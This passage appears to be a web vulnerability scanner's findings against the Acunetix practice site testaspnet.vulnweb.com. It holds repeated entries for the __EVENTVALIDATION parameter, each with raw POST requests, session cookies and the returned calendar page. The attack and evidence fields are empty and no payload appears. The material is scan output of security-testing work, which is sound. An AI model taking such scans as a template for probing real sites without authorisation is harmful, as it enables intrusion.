href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1173 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,173 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8168&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBA%2BoVzNNoIZGRk6M%2BrdXfXASjJ2gCkGg%2BPfcVI%2F8U%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLg%2F9nYCAK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPhQZZWIUwidwYnIykNtRt6xXx%2B1E%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:32:59 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBA+oVzNNoIZGRk6M+rdXfXASjJ2gCkGg+PfcVI/8U=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLg/9nYCAK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPhQZZWIUwidwYnIykNtRt6xXx+1E=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:White" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8520&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBAYtcNSdsIZGRkS12gpCfvuhIKUv13hpmxEr3shsY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLG2p%2FvDALQp%2BbjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9%2BDiBQKN9%2BDiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2%2F3gkC5p2%2F3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC%2B6SdxQ8C%2B6SdxQ8C%2B6SxmAcC%2B6SxmAcC%2B6SlPwL7pKU%2FAvuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk%2FawJAvuk%2FawJAvukkcMCAvukkcMCAtzL4%2BgFAtzL4%2BgFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv%2FkPAtzLv%2FkPAtzL050HAtzL050HAtzLxzAC3MvHMALcy%2FvXCQLcy%2FvXCQLcy%2B%2FqAgLcy%2B%2FqAgLcy8PTDwLcy8PTDwLcy%2Ff2CALcy%2Ff2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA%2BoWSfVKRMCrI9OyXTDucAyyl8ya
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:52:30 GMT Content-Length: 12416
Response Body - size: 12,416 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzAHXSdsIHgJTRBYBBgBAYtcNSdsIZGRkS12gpCfvuhIKUv13hpmxEr3shsY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLG2p/vDALQp+bjBwKqztTQBQKN99ioAwKN99ioAwKN98zPDAKN98zPDAKN9+DiBQKN9+DiBQKN95S5DQKN95S5DQKN94jcBgKN94jcBgKN97zzDwKN97zzDwKN99CXBwKN99CXBwKN98QqAo33xCoCjfe4kg0Cjfe4kg0CjfesqQYCjfesqQYC5p2/3gkC5p2/3gkC5p3T8gIC5p3T8gIC5p3HiQoC5p3HiQoC5p37rAMC5p37rAMC5p3vwwwC5p3vwwwC5p2D5gUC5p2D5gUC5p23vQ0C5p23vQ0C5p2r0AYC5p2r0AYC5p2fuQMC5p2fuQMC5p2z3AwC5p2z3AwC+6SdxQ8C+6SdxQ8C+6SxmAcC+6SxmAcC+6SlPwL7pKU/Avuk2dMJAvuk2dMJAvukzfYCAvukzfYCAvuk4Y0KAvuk4Y0KAvuklaADAvuklaADAvukiccMAvukiccMAvuk/awJAvuk/awJAvukkcMCAvukkcMCAtzL4+gFAtzL4+gFAtzLl48NAtzLl48NAtzLi6IGAtzLi6IGAtzLv/kPAtzLv/kPAtzL050HAtzL050HAtzLxzAC3MvHMALcy/vXCQLcy/vXCQLcy+/qAgLcy+/qAgLcy8PTDwLcy8PTDwLcy/f2CALcy/f2CAKx0sGfCgKx0sGfCgKx0vWyAwKx0vWyA+oWSfVKRMCrI9OyXTDucAyyl8ya" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8491')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:White" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8527')" style="color:Black" title="May 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8528')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8529')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8530')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8531')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8532')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8533')" style="color:Black" title="May 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8534')" style="color:Black" title="May 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8535')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8536')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8537')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8538')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8539')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8540')" style="color:Black" title="May 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8541')" style="color:Black" title="May 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8542')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8543')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8544')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8545')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8546')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8547')" style="color:Black" title="May 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a 